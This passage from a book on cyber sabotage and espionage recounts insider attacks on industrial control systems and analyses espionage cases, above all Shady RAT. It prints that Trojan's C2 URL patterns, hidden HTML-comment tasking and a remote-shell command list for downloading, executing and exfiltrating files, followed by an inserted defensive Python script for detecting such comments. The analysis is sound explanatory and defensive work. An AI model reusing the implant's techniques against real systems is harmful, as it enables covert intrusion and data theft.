security-by-obscurity is a fact of life, even if they don’t like the idea in theory. 39

Yet the debate about the pros and cons of security-by-obscurity misses one central point: the insider. Claude Shannon, an American pioneer in information theory, famously reformulated Kerckhoffs’s Principle as “The enemy knows the system.” For Shannon this statement was a theoretical assumption that may be true in exceptional cases, rather than being a factual statement. The situation is different for the saboteur who is already on his target’s payroll. The insider actually knows the system. And the insider may be that enemy. The most successful sabotage operations by computer attack, including Stuxnet and Shamoon, allegedly relied on some form of inside support. Precisely what that inside support looked like remains unclear in both cases. Yet in other cases it is better documented. Three examples will illustrate this.

In early 2000, Time magazine reported two years after the fact that the Russian energy giant Gazprom had suffered a serious breach as a result of an insider. A disgruntled employee, Russian officials allegedly told Time, helped “a group of hackers” penetrate the company’s business network and “seize” Gazprom’s computers for several hours. The intruders could allegedly control even the SCADA systems that monitor and regulate the gas flow through the company’s vast network of pipelines. Executives in the politically well-connected firm were reportedly furious when the information was made public. Fearing embarrassment, Gazprom denied reports of the incident in the Russian press. “Heads rolled in the Interior Ministry after the newspaper report came out,” Time quoted another senior official. “We were very close to a major natural disaster.” 40 A small natural disaster happened as a result of a successful breach a few years later.

The second example occurred in March and April 2000 in the Shire of Maroochy, on Queensland’s Sunshine Coast in Australia. The Maroochy incident is one of the most damaging breaches of a SCADA system to have ever taken place. After forty-six repeated wireless intrusions into a large wastewater plant over a period of three months, a lone attacker succeeded in spilling more than a million liters of raw sewage into local parks, rivers, and even the grounds of a Hyatt Regency hotel. The author of the attack was 49-year-old Vitek Boden. His motive was revenge; the Maroochy Shire Council had rejected his job application. 41 At the time Boden was an employee of the company that had installed the Maroochy plant’s SCADA system. The Australian plant’s system covered a wide geographical area and radio signals were used to communicate with remote field devices, which start pumps or close valves. And Boden had the software to control the management system on his laptop and the knowledge to operate the radio transmitting equipment. This allowed him to take control of 150 sewage pumping stations. The attack resulted in hundreds of thousands of liters of raw sewage being pumped into public waterways. The Maroochy Shire Council’s clean-up work took one week and cost $13,000, plus an additional $176,000 to update the plant’s security. “Vitek Boden’s actions were premeditated and systematic, causing significant harm to an area enjoyed by young families and other members of the public,” said Janelle Bryant at the time, the investigations manager at the Queensland Environmental Protection Agency. “Marine life died, the creek water turned black and the stench was unbearable for residents.” 42 Boden was eventually jailed for two years. 43

Another, lesser-known ICS insider attack happened in early 2009 in a Texas hospital, the W.B. Carrell Memorial Clinic in Dallas. The incident did not cause any harm, but resulted in a severe criminal conviction. A night guard at the hospital, Jesse William McGraw, had managed to hack Carrell’s Heating, Ventilation and Air Conditioning (HVAC) system as well as a nurse’s computer that contained confidential patient information. McGraw then posted online screenshots of the compromised HVAC system and even brazenly published a YouTube video that showed him installing malware on the hospital’s computers that made the machines slaves for a botnet that the twenty-five-year-old operated. McGraw used the moniker “GhostExodus” and proclaimed himself the leader of the hacking group “Electronik Tribulation Army,” which he envisioned as a rival of Anonymous. In the early hours of 13 February 2009, the night guard-turned-hacker physically accessed the control system facility for the clinic’s ventilation system without authorization, inserted a removable storage device, and ran a program that allowed him to emulate a CD/DVD drive. McGraw could have caused significant harm: “The HVAC system intrusion presented a health and safety risk to patients who could be adversely affected by the cooling if it were turned off during Texas summer weather conditions,” the FBI’s Dallas office argued, although summer was still a few months off. 44 But hospital staff had reportedly experienced problems with the air conditioning and ventilation system, wondering why the alarm did not go off as programmed. McGraw’s screenshots revealed that the alarm notification in the hospital’s surgery center had indeed been set to “inactive.” 45 In March 2011, two years after his offense, McGraw was sentenced to 110 months in federal prison. 46
A further, most curious insider incident occurred on 17 November 2011. Joe Weiss, a security consultant working in the control systems industry, published a blog post, “Water System Hack—The System Is Broken.” Weiss alleged that an intruder from Russia had hacked into an American water utility, stole customer usernames and passwords, and created physical damage by switching the system on-and-off until the water pump was burned out. Minor glitches were observed for two to three months, Weiss wrote, which were then identified as a malicious cyber attack. 47 Weiss’s information seems to have been based on a leaked report by the Illinois Statewide Terrorism and Intelligence Center, which was based on raw and unconfirmed data. 48 The Washington Post covered the story and identified the alleged attack as the first foreign SCADA attack against a target in the United States, the Curran-Gardner Townships Public Water District in Springfield, Illinois. “This is a big deal,” Weiss was quoted in the paper, “It was tracked to Russia. It has been in the system for at least two to three months. It has caused damage.” 49 The article did not ask why anybody in Russia would attack a single random water plant in the Midwestern United States. The FBI and the Department of Homeland Security started investigating the incident in Springfield and quickly cautioned against premature conclusions. One week later the facts were established. A contractor working on the Illinois water plant was traveling in Russia on personal business at the time and remotely accessed the plant’s computer systems. The information was not entirely wrong: the plant had a history of malfunction, a pump failed, and somebody from an IP address in Russia accessed the system. Yet the incident and the misunderstanding illustrate several things: it shows how malicious intention and activity would turn an accident into an attack—but in the case of the contractor logging into the Springfield water plant from Russia that malicious intent was absent. The incident also shows how urban legends about successful SCADA attacks are created. The problem of false ICS attacks is so common that the British Columbia Institute of Technology’s Industrial Security Incident Database used to have a separate category for “Hoax/Urban Legend.” 50

But it turned out to be premature and dangerous to dismiss the risk of a devastating attack against critical infrastructure and utility companies, as one hacker demonstrated in the aftermath of the Springfield water hack story. One reader of the British IT news site The Register was so incensed by the statement of a government official that he decided to take action. “My eyes were drawn, nary, pulled, to a particular quote,” the angry hacker wrote in a Pastebin post a day later. One US Department of Homeland Security official had commented that, “At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety.” 51 This statement was highly controversial, even naive, especially as it came from an official. “This was stupid. You know. Insanely stupid. I dislike, immensely, how the DHS tend to downplay how absolutely fucked the state of national infrastructure is.” 52 So he decided to prove the government wrong by showing how bad the situation actually is. Using the handle pr0f, the angry reader proceeded to penetrate into the human-machine interface software of a SCADA system used by a water plant in South Houston, which serves 16,000 Texans with water. With the help of the public Shodan search engine that looks for fingerprints of SCADA systems online, pr0f allegedly found that the plant in South Houston was running the Siemens Simatic HMI software, connected to the Internet, and protected by a simple three-character password. The twenty-two-year-old unemployed hacker then made five screenshots of the human-machine interface and posted links to the files on Pastebin. The break-in took barely ten minutes. Pr0f did not do any damage and did not expose any details that could make it easy for malicious hackers to do damage, expressing his dislike of vandalism. The still unknown intruder allegedly favors hoodie sweatshirts and lives in his parents’ home somewhere overseas. 53 The city of South Houston upgraded its water plant to the Siemens system long before 11 September 2001, before the debate about industrial control systems as targets had caught on. “Nobody gave it a second thought,” Mayor Joe Soto told The Washington Post. “When it was put in, we didn’t have terrorists.” Soto knew that pr0f had chosen his target more or less randomly. “We’re probably not the only one who is wide open,” the mayor said later, “He caught everyone with our pants down.” 54

A comparable incident occurred over February and March 2012. One or multiple users from unauthorized IP addresses accessed the ICS network of an unidentified New Jersey air conditioning company, according to a memo published by the FBI. 55 The intruders used a backdoor to access the company’s Tridium Niagara system, enabling them to control the system remotely. It is not known if the intruders actually changed the system settings or caused any damage. But they could have caused damage. The Niagara AX framework is installed on over 300,000 systems worldwide in applications such as energy management, building automation, telecommunications, including heating, fire detection, and surveillance systems for the Pentagon, the FBI, and America’s Internal Revenue Service. 56 In the case of the New Jersey AC company, the intruder was able to access a “Graphical User Interface, which provided a floor plan layout of the office, with control fields and feedback for each office and shop area,” the FBI reported. “All areas of the office were clearly labeled with employee names or area names.” The incident could be traced back to two messages on Pastebin from January 2012. 57 A user with the Twitter handle @ntisec, for “anti-security,” had posted a list of IP addresses, one of which led to the unidentified company. @ntisec identified himself as an “anarcho-syndicalist” who sympathized with Anonymous. He found the vulnerability through Google and Shodan by searching for “:|slot:/,” he reported. @ntisec seemed surprised by the ease with which he could get to various meter readings and control panels online:

Don’t even need an exploit to get in here. Don’t even have to be a hacker. 
No passwords what so ever. 

So how is the state of your other #SCADA systems like your electrical 
grid? Or traffic management? 

What about chemical industry? Or can hackers switch some stuff that 
sends trains to another fail ? 58 

Yet the anarcho-syndicalist seemingly didn’t want to live up to his 
declared ideology, explicitly warning fellow amateur hackers not to do 
anything illegal, or, as it were, anarchical: 

Be careful and don’t cause rampant anarchy. They might trace you and I 
have warned you not to alter control states. Just have a look around to see 
[for] yourself how these systems affect our everyday life . 59 

The unidentified intruders apparently did exactly that: using @ntisec’s public backdoor URL to gain administrator-level access to the company’s industrial control systems—no firewall to breach, no password required, as the FBI noted. It is unclear if the hackers also took @ntisec’s advice and didn’t alter the system’s control states. Either way, it seems that no harm was caused.

These incidents—Maroochy, Springfield, Houston, Carrell—are a far cry from “cyber war.” None harmed any human beings, and none had a tangible political goal. Yet they are among the most serious control system intrusions on record. But it would be shortsighted to dismiss the threat of serious computer attacks: the future of computer sabotage seems to be bright and the phenomenon seems to be on the rise. In 2012, the number of malicious programs that were able to “withdraw efficiency” from companies and governments multiplied quickly. Stuxnet set a new standard for what is possible. Shodan, the search engine, has removed some obscurity by exposing a vast number of Internet-facing control systems, although the details of the various installations certainly remain obscure, thus limiting what an attacker could accomplish, but by no means preventing a successful attack. A physically harmful attack on an industrial control system is a highly likely future scenario. “Eventually, somebody will get access to a major system and people will be hurt,” pr0f, the hacker who penetrated the Houston water plant, told The Washington Post. “It’s just a matter of time.” But it is important to keep these risks in perspective. Almost all acts of computer-sabotage to date have been non-violent, harming neither machines nor human beings (Stuxnet, which harmed an unknown number of machines in Iran’s Natanz nuclear enrichment plant, seems to be the only known exception). Such non-violent acts of sabotage seem to be on the rise—the Saudi Aramco incident discussed in the opening paragraph of this chapter is an ideal example, not least because the attack’s ICS component failed—and they clearly have the capability to undermine the trust and the confidence that consumers and citizens place in companies and governments, and in the products and services that they offer. They can also undermine the trust the executives place in their organization. Increased digitization and automation offer more and more opportunities for attackers to withdraw efficiency without actual physical destruction. In that sense sabotage in the age of computer attack is becoming less violent, not more violent.
The second offensive activity that is neither crime nor war is espionage. Cyber espionage is an attempt to penetrate an adversarial computer network or system for the purpose of extracting sensitive or protected information. Two major distinctions dominate the organization as well as the study of intelligence. Intelligence agencies may either restrict themselves to collecting and analyzing information, remaining largely passive observers, or they may also engage in operations, almost always covert operations, with the intention of concealing either the entire operation (clandestine operations) or at least the identity of the sponsor. The second distinction concerns the nature of intelligence collection: it can be either social or technical in nature. That division of labor is old. In the intelligence community it is reflected in the distinction between human intelligence, HUMINT, and signals intelligence, SIGINT. Sensitive information transmitted by telecommunication is often encrypted. Espionage that takes advantage of SIGINT therefore requires specialists in decryption and cryptanalysis. The field of signals intelligence is wide: it includes intercepting civilian and military radio signals, satellite links, telephone traffic, and mobile phone conversations, and of course intercepting communication between computers over various protocols, such as email and voice-over-IP. Gaining illicit access to computer networks is therefore only one, albeit a fast-growing, part of signals intelligence. Some conceptual clarity can be achieved by applying both distinctions to cyberspace. Cyber espionage, for the purposes of this study, refers to the clandestine collection of intelligence by intercepting communications between computers as well as by breaking into somebody else’s computer networks in order to exfiltrate data. Cyber sabotage, by contrast, would be the computer-attack equivalent of covert operations: infiltrating an adversarial computer system with malicious software in order to create a desired physical effect or to withdraw efficiency from a process. The level of technical sophistication required for cyber espionage may be high, but the requirements are less demanding than for complex sabotage operations. This is because espionage is not directly instrumental: its main purpose is not achieving a goal but gathering the information that may be used to design more concrete instruments or policies. The novel challenge of code-enabled sabotage has been discussed in the previous two chapters on cyber weapons and sabotage. This chapter will focus on cyber espionage.

The most widespread use of state-sponsored cyber capabilities is for the purposes of espionage. Empirically, the vast majority of all political cyber security incidents have been cases of espionage, not sabotage. And an ever more digitized environment is vastly increasing the number of actors in the espionage business. Professionally and expensively trained agents working for governments (or large companies) have new competition from hackers and private individuals, sometimes acting on their own initiative yet providing information for a larger cause. This chapter will explore the extent of the problem and the major notable cases where details are available in the public domain: what are the most spectacular network breaches on record? How significant is the threat of electronic espionage? (Or, from an offender’s point of view, how big is the opportunity for cyber espionage?) And what does this mean for intelligence agencies struggling to adapt to a new set of challenges?

The argument put forward on the following pages holds, in sharp contrast to the cyber security debate’s received wisdom, that three paradoxes are limiting the scope of cyber espionage. The first is the danger paradox: cyber espionage is not an act of war, not a weapon, and not an armed attack, yet it is a serious threat to the world’s most advanced economies. Experts in the use of code are, to a degree, replacing experts in the use of force—computer spying, in short, is entirely non-violent yet most dangerous. But there is a caveat: those who are placing their bets on stripping their adversaries of a competitive advantage should be careful not to overestimate the possibilities of large-scale data exfiltration. Cyber espionage’s second characteristic is the significance paradox: although cyber espionage is perhaps the most significant form of cyber attack, it may not represent a fundamentally game-changing development for intelligence agencies—cyber espionage is a game-changer, but not for the best spy agencies. This is explained by the third seeming contradiction, which I call the normalization paradox: an intelligence agency taking cyber operations seriously will back these operations up with human sources, experienced informers, and expert operatives, thus progressively moving what the debate refers to as “cyber espionage” out of the realm of “cyber” and back into the realm of the traditional tradecraft of intelligence agencies, including HUMINT and covert operations. The outcome may be surprising: the better intelligence agencies become at “cyber,” the less they are likely to engage in cyber espionage narrowly defined. Something comparable applies in the arena of commercial espionage.

The argument is presented in five steps. Understanding the challenge 
of espionage, especially industrial espionage, requires understanding the 
nature of transferring technical expertise. The chapter therefore opens 
with a short conceptual exploration: at closer view, personalized expert 
knowledge about complex industrial or political processes cannot be 
downloaded as easily as is generally assumed. Secondly, some of the 
major cases of cyber espionage will be explored in detail, including 
Duqu, Flame, and Shady Rat. Thirdly, the growing role of social media 
in the cyber espionage business will be examined briefly. The chapter 
concludes by discussing some of the inherent difficulties associated with 
cyber espionage: distinguishing it from cyber crime, defending against 
it, doing it, and estimating the damage it causes as well as its benefits. 

Some conceptual help is required to understand these limitations. We can get this help from Michael Polanyi, a highly influential philosopher of science. 1 Polanyi’s work inspired one of the most influential books on creativity and innovation ever written, Ikujiro Nonaka’s The Knowledge-Creating Company, published in 1995. 2 One of Polanyi’s core distinctions is that between tacit and explicit knowledge. Tacit knowledge is personal, context-specific, and difficult to formalize and to communicate, Nonaka pointed out. It resides in experience, in practical insights, in teams, in established routines, in ways of doing things, in social interactions. Such experiences and interactions are hard to express in words. Video is a somewhat better format for transmitting such knowledge, as anybody who has tried to hone a specific personal skill—from kettlebell techniques to cooking a fish pie to building a boat—intuitively understands. Explicit knowledge, on the other hand, is codified and transmittable in formal, systematic language, for instance in an economics textbook or in a military field manual. Explicit knowledge, which can be expressed in words and numbers, is only the tip of the iceberg. That iceberg consists largely of tacit knowledge.

A bread-making machine is one of Nonaka’s most instructive examples. In the late 1980s, Matsushita Electric, based near Osaka and now Panasonic, wanted to develop a top-of-the-line bread-making machine. The company compared bread and dough prepared by a standard machine with that of a master baker. X-raying the dough revealed no meaningful differences. Ikuko Tanaka, the head of software development, then embedded herself with a well-known chef at the Osaka International Hotel, famous for its delicious bread. Yet merely observing the head baker didn’t teach Tanaka how to make truly excellent bread. Only through imitation and practice did she learn how to stretch and twist the dough the right way. Even the head baker himself would not have been able to write down the “secret” recipe: it was embedded in his long-honed routines and practices. Japanese dough and bread-making holds an important lesson for Western intelligence agencies. Tacit knowledge is a major challenge for espionage, especially industrial espionage. A Chinese company that is remotely infiltrating an American competitor’s network will have difficulty, metaphorically speaking, baking bread to its customers’ delight, let alone manufacturing a far more complex product like chloride-route processed titanium dioxide, as in one of the largest China-related conventional corporate espionage cases, involving the chemical company DuPont. 3

No doubt: economic cyber espionage is a major problem. But remotely stealing and then taking advantage of trade secrets by clandestinely breaching a competitor’s computer networks is more complicated than meets the eye. This becomes evident if one tries to list the most significant cases where cyber espionage caused real and quantifiable economic damage of major proportions—that list is shorter and more controversial than the media coverage implies. Among the most high-profile cases are three. A remarkable one is a hack that involved the Coca-Cola Corporation. On 15 March 2009, FBI officials quietly approached the soft drink company. They revealed that intruders, possibly the infamous “Comment Group,” had hacked into Coca-Cola’s networks and stolen sensitive files about an attempted acquisition of China Huiyuan Juice Group. The deal, valued at $2.4 billion, collapsed three days later. 4 Had the acquisition succeeded, it would have been the largest foreign takeover of a Chinese company at the time. A second, seemingly similar British case was revealed by MI5’s Jonathan Evans in mid-2012, when one UK-listed company allegedly lost an £800 million deal as a result of cyber espionage, although the details remain unknown. 5 Possibly the most consequential, but also highly controversial, example is the demise of Nortel Networks Corp., a once-leading telecommunications manufacturer headquartered in Ontario, Canada. After the troubled company entered bankruptcy proceedings and then liquidation in 2009, Nortel sources claimed that Chinese hackers and a nearly decade-long high-level breach had caused, or at least contributed to, Nortel’s fall. 6 But again, details about how precisely the loss of data damaged the firm remain mysterious. Other cases of real-life costs are discussed later in this book.

Yet these brief examples already illustrate how difficult it is to analyze computer espionage cases and draw general observations from them. The nature of the exfiltrated data is critical: process-related knowledge (think: bread making) may reside more in routines and practices than in reports or on hard drives, and therefore seems harder to steal and to replicate remotely, whereas confidential data about acquisitions and business-to-business negotiations may be pilfered from top executives and exploited more easily. Only a close empirical analysis can shed light on the challenges and limitations of cyber espionage. But too often what is known publicly are merely details about the exfiltration method, not details about the exfiltrated data and how it was or was not used. The following pages will introduce most major cases of cyber espionage and often push the inquiry right to the limit of what is known about these cases in the public domain.

Perhaps the earliest example of cyber espionage is Moonlight Maze, which was discussed in chapter one. A more consequential example is Titan Rain. Titan Rain is the US government codename for a series of attacks on military and governmental computer systems that took place in 2003 and continued persistently for years. Chinese hackers had probably gained access to hundreds of firewalled networks at the Pentagon, the State Department, and the Department of Homeland Security, as well as at defense contractors such as Lockheed Martin. It remains unclear whether Chinese security agencies were behind the intrusion or whether an intruder merely wanted to mask his true identity by using computers based in China. Whoever was behind Titan Rain, the numbers were eye-popping. In August 2006, during an Air Force IT conference in Montgomery, Alabama, Major General William Lord, then the director of information, services and integration in the Air Force’s Office of Warfighting Integration, publicly described the extent of what he believed was China’s state-sponsored espionage operation against America’s defense establishment. “China has downloaded 10 to 20 terabytes of data from the NIPRNET already,” he said, referring to the Pentagon’s non-classified but still sensitive IP router network. At the time the attackers had not yet breached the Pentagon’s classified network, the so-called SIPRNET, the Secret Internet Protocol Router Network. 7 But the unclassified network contains the personal information, including the names, of every single person working for the Department of Defense. 8 That, Lord assumed, was one of the most valuable things the attackers were after. “They’re looking for your identity so they can get into the network as you,” Lord told the airmen and Pentagon employees assembled at Maxwell Air Force Base.

Twenty terabytes is a lot of information. If the same amount of data were printed on paper, physically carrying the stacks of documents would require “a line of moving vans stretching from the Pentagon to the Chinese freighters docked in Baltimore harbor 50 miles away,” calculated Joel Brenner, a former senior counsel at the National Security Agency. 9 And the Department of Defense was certainly not the only target, so there was more than one proverbial line of trucks stretching from Washington to Baltimore. In June 2006, for instance, America’s Energy Department publicly revealed that the personal information of more than 1,500 employees of the National Nuclear Security Administration had been stolen. The intrusion into the nuclear security organization’s network had happened in 2004, but the NNSA only discovered the breach a year after it had happened.

In November 2008, the US military witnessed what could be the most significant breach of its computers to date. An allegedly Russian piece of spyware was introduced by a flash drive plugged into a laptop at a base in the Middle East, “placed there by a foreign intelligence agency,” according to the Pentagon’s number two. 10 It then started scanning the Internet for dot-mil domain addresses. In this way the malware gained access to the Pentagon’s unclassified network, the NIPRNET. The Defense Department’s global secure intranet, the SIPRNET, designed to transmit confidential and secret-level information, is protected by an air gap or air wall, meaning that the secure network is physically, electrically, and electromagnetically separated from insecure networks. So once the malware was on a hard drive in the NIPRNET, it began copying itself onto removable thumb drives. The hope was that an unknowing user would carry it across the air gap into the SIPRNET, a problem known as the “sneakernet” effect among the Pentagon’s security experts. 11 That indeed seems to have happened, and a virtual beachhead was established. But it remains unclear whether the software was able to extract information from the classified network, let alone what and how much.

“Shady RAT” is another well-known and well-executed case. It is the selection of targets that points to a specific country, though not to a specific actor within that country, and in the case of Shady RAT China is the suspect. RAT is a common acronym in the computer security industry and stands for Remote Access Tool (or Remote Access Trojan). McAfee, the company that discovered and named the operation, ominously hinted at the enterprising and courageous features of the rat in the Chinese horoscope. The attack is relatively well documented, so it is instructive to look under the hood for a moment.

The attackers operated in a sequence of four steps. First they selected specific target organizations according to economic or political criteria. The second step was the actual penetration. To penetrate a company’s or an organization’s computers, the attackers chose specific individuals within those target organizations as entry points. The contact information and email addresses of these employees could sometimes be gleaned from LinkedIn. Based on all available information, the attackers then tailored emails to their specific recipients, complete with attachments in commonly used Microsoft Office formats such as .PPT, .DOC, or .XLS, but also PDF files. The files contained exploit code that, when the attachment was opened, would execute and compromise software running on the recipient’s computer. This spear-phishing ploy was remarkably sophisticated at times. One such email, sent to selected individuals, had the subject line “CNA National Security Seminar.” CNA referred to the Alexandria-based Center for Naval Analyses. The email’s body was even more specific:

We are pleased to announce that Dr. Jeffrey A. Bader will [be] the distinguished speaker at the CNA National Security Seminar (NSS) on Tuesday, 19 July, from 12:00 p.m. to 1:30 p.m. Dr. Bader, who was Special Assistant to the President and Senior Director for East Asian Affairs on the National Security Council from January 2009 to April 2011, will discuss the Obama Administration and East Asia. 12

The phishing email’s content was not plucked out of thin air but referred to an event actually scheduled at CNA, and was therefore highly credible. The attached file, “Contact List.XLS,” contained a well-known exploit for the Microsoft Excel “FEATHEADER” Record Remote Code Execution Vulnerability (CVE-2009-3129, patched by Microsoft in bulletin MS09-067 in November 2009; Symantec detected the exploit as Bloodhound.Exploit.306). 13 The exploit was still effective against any recipient whose computer had not installed Microsoft’s security updates. On such a machine, opening the file silently installed a Trojan while a clean copy of the spreadsheet opened as the user expected, so as to avoid suspicion. One possible tell-tale sign of this particular exploit, Symantec reported, was that the Excel application would appear unresponsive for a few seconds and then resume operating normally, or it might crash and restart.

Shady RAT’s third step followed suit. As soon as the Trojan had installed itself on the targeted machine, it attempted to contact a command-and-control site through the target computer’s Internet connection. The web addresses of these control sites were hard-coded into the malware. Examples were:

http://www.swim[redacted].net/images/sleepyboo.jpg
http://www.comto[redacted].com/Tech/Lesson15.htm
http://www.comto[redacted].com/wak/mansher0.gif

Curiously, the addresses pointed to what looked like ordinary image or HTML files, among the web’s most common file formats. This tactic, Symantec explained, was designed to get past firewalls and web filters: most are configured to let .JPG, .HTM, or .GIF files pass without arousing suspicion. The Trojan’s image and text files also looked entirely legitimate, even if superficially inspected by a human operator. One file, for instance, was headed “C# Tutorial, Lesson 15: Drawing with Pen and Brush,” pretending to be a manual for a specific piece of software. The text went on:
In this lesson I would like to introduce the Pen and the Brush objects. These objects are members of GDI+ library. GDI+ or GDI NET is a graphics library ...

And so on. Yet, on closer examination, command-and-control code could be found behind the files’ façade. The .HTM file, for instance, contained hidden HTML comments. Programmers and website designers use HTML comments to make notes within HTML files. These notes are ignored by the browser when it renders the file into a visually displayed page, but they are visible to anybody reading the entire HTML source, be it a human or a program. The beginning of such a comment is marked with “<!--” and its end with “-->”. Shady RAT hid the coveted commands in these HTML comments. An example:

<!--{685DEC108DA731F1}-->
<!--{685DEC108DA73CF1}-->
<!--{eqNBb-0u07WM}-->
<!--{ujQ-iY,UnQ[!,hboZWg}-->

Even if a zealous administrator opened the .HTM file in a plain text editor, which is normally used to write or modify legitimate code, these comments would look unsuspicious and harmless. Many programs used to design websites leave such unintelligible comments behind. But the Shady RAT Trojan was able to decipher the cryptic comments by “parsing” them, as computer scientists say. Once parsed, the actual commands appear:

run: {URL/FILENAME}
sleep: {20160}
{IP ADDRESS}:{PORT NUMBER}

The first command, for instance, would result in an executable file being downloaded into a temporary folder on the target computer’s hard drive and then executed, much like clandestinely installing a malicious app from an illegitimate app store. What that executable would be able to do is not specified by the Trojan. The second command, “sleep,” would tell the Trojan to lie dormant for two weeks (the argument, 20160, is counted in minutes) and then awake to take some form of action. The third command is perhaps the most useful for the designers of the Shady RAT attack. It takes the attack to the next level by telling the compromised machine to open a remote connection to another computer, identified by its IP address, at a specific port.
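The comment channel and the tasking grammar described above are easy to check for on the defender’s side. The following Python script is an added example written for this edition, not code from the page, from McAfee or from Symantec. It extracts comments of the form <!--{...}--> from fetched HTML, flags bodies that look like opaque tokens (no whitespace, at least eight characters, Shannon entropy at or above a chosen threshold), and parses already-decoded tasking lines into the three verbs the text lists. The sample page, the thresholds and the host name ending in .invalid are constructed for the example; the step that turns a comment body into a decoded tasking line is not described on the page and is therefore not implemented.

```python
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Shady RAT's tasking rode inside HTML comments shaped like <!--{...}-->.
BRACED_COMMENT = re.compile(r"<!--\s*\{(?P<body>[^{}]*)\}\s*-->")

# Decoded tasking lines, in the three shapes quoted on the page.
RUN_RE = re.compile(r"^run:\s*\{(?P<url>[^}]+)\}$")
SLEEP_RE = re.compile(r"^sleep:\s*\{(?P<minutes>\d+)\}$")
CONNECT_RE = re.compile(
    r"^\{?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\}?:\{?(?P<port>\d{1,5})\}?$"
)

# Constructed sample (not a real capture): a decoy "C# tutorial" page carrying the
# four comment bodies quoted on the page plus ordinary comments that must not be flagged.
SAMPLE_HTML = """<html><head><title>C# Tutorial, Lesson 15: Drawing with Pen and Brush</title>
<!-- Generated by a page builder -->
<!--{ cache: off }-->
<!--{TOC}-->
</head><body>
<p>In this lesson I would like to introduce the Pen and the Brush objects.</p>
<!--{685DEC108DA731F1}-->
<!--{685DEC108DA73CF1}-->
<!--{eqNBb-0u07WM}-->
<!--{ujQ-iY,UnQ[!,hboZWg}-->
</body></html>"""


def shannon_entropy(text: str) -> float:
    """Bits per character over the token's own symbol distribution (max 4.0 for 16 hex digits)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


@dataclass(frozen=True)
class Finding:
    offset: int      # character offset of the comment within the page
    body: str        # the token between the braces
    entropy: float   # bits per character, rounded


def find_covert_comments(html: str, min_len: int = 8, min_entropy: float = 3.0) -> List[Finding]:
    """Flag braced comments whose body is an opaque token rather than a human note.

    Three filters, all chosen for this example: the body contains no whitespace (real
    notes such as "{ cache: off }" do), it is at least min_len characters long, and
    its entropy is at or above min_entropy bits per character."""
    hits = []
    for m in BRACED_COMMENT.finditer(html):
        body = m.group("body")
        if len(body) < min_len or any(ch.isspace() for ch in body):
            continue
        ent = shannon_entropy(body)
        if ent >= min_entropy:
            hits.append(Finding(m.start(), body, round(ent, 2)))
    return hits


def parse_tasking(line: str) -> Tuple[str, Optional[object]]:
    """Parse one decoded tasking line into (verb, argument).

    Returns ("run", url), ("sleep", minutes), ("connect", (ip, port)) or ("unknown", line).
    Decoding a comment body into such a line is the implant's secret and is not done here."""
    line = line.strip()
    m = RUN_RE.match(line)
    if m:
        return ("run", m.group("url"))
    m = SLEEP_RE.match(line)
    if m:
        return ("sleep", int(m.group("minutes")))
    m = CONNECT_RE.match(line)
    if m:
        ip, port = m.group("ip"), int(m.group("port"))
        if 0 < port < 65536 and all(int(octet) < 256 for octet in ip.split(".")):
            return ("connect", (ip, port))
    return ("unknown", line)


if __name__ == "__main__":
    for f in find_covert_comments(SAMPLE_HTML):
        print(f"offset {f.offset:5d}  entropy {f.entropy:.2f}  {f.body}")
    for task in ("run: {http://www.comto.invalid/wak/up.exe}", "sleep: {20160}",
                 "{203.0.113.7}:{443}", "just a note"):
        print(parse_tasking(task))
```

Run against a proxy cache or a suspect fetch, the four quoted tokens are reported while the page builder note, the “cache: off” directive and the short “TOC” placeholder are not; the entropy threshold is a tunable, and a site that legitimately embeds build hashes in comments will need a whitelist rather than a higher cut-off.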

That final step of the Shady RAT attack enables the attackers to control the target computer directly. The Trojan establishes what is called a “remote shell” with the machine that holds the desired information. A hidden remote shell is a bit like plugging a distant screen and a separate keyboard into the machine, clandestinely, all hidden from the user who in the meantime may be working on a document in Microsoft Word or writing an email in Outlook. To install the attacker’s hidden screen and keyboard, the Trojan waits for a handshake from its controller through the freshly established port connection. To identify themselves, the attackers would whisper a password to the hidden Trojan. The string looked somewhat like the following seemingly random characters:

Once the Trojan received the password it sprang into action by copying a specific file, cmd.exe, into a folder reserved by the Microsoft operating system. The espionage software then used the newly copied file to open a remote shell, that is, the remote screen and keyboard, giving the attackers significant control over the files on the compromised machine. Below is a list of commands that the attacker may use to get to work:

gf:{FILENAME} retrieves a file from the remote server.
http:{URL}.exe retrieves a file from a remote URL, beginning with http and ending in .exe. The remote file is downloaded and executed.
pf:{FILENAME} uploads a file to the remote server.
taxi:Air Material Command sends a command from the remote server.
sip:{RESULT} sends the results of the command executed above to the remote server to report the status. 14

These commands are quite comprehensive. The gf command, for instance, allows the attacker to bring in additional malware, say to do a specific job that the Trojan is not equipped for in the first place. The most coveted command may be pf, which was used to exfiltrate specific files from a targeted organization to the hidden attacker, clandestinely of course.

McAfee was the first to make the attack public, in a report in early August 2011. 15 The report was led by Dmitri Alperovitch, McAfee’s vice president for threat research. Alperovitch’s team was able to identify seventy-one organizations from the log files of one command-and-control server. Among the targets were thirteen defense contractors, six agencies of the US Federal Government, five national and international Olympic Committees, three companies in the electronics industry, three companies in the energy sector, and two think tanks, as well as the Canadian and Indian governments and the United Nations. 16 Forty-nine targets were in the United States, and the rest were in Western Europe and leading Asian countries, including Japan, South Korea, Taiwan, and India. That the Olympic Committees as well as the World Anti-Doping Agency were targeted was especially curious. Beijing hosted the Games in 2008, just when the attacks seemed to peak. Alperovitch concluded that this fact “potentially pointed a finger at a state actor behind the intrusions,” especially because the Olympics-related intrusions were unlikely to result in any immediate economic benefit. Some attacks also continued for an extended period of time. McAfee reported that one major American news organization headquartered in New York City was compromised for more than twenty-one months.

McAfee called the attacks “unprecedented.” Alex Gostev, chief security expert at Kaspersky Lab, one of McAfee’s competitors, disputed this finding. “Until the information in the McAfee report is backed up by evidence, to talk about the biggest cyberattack in history is premature,” he told Computerworld shortly after the attack became public. 17 Others agreed. “Is the attack described in Operation Shady RAT a truly advanced persistent threat?” asked Symantec researcher Hon Lau in a blog post. “I would contend that it isn’t.” 18 Whatever the operation’s best description, details about the volume and the nature of the exfiltrated data remain largely unknown. It is also unclear if and how the attackers were able to take advantage of the stolen information. Unfortunately this lack of knowledge is the rule rather than the exception.

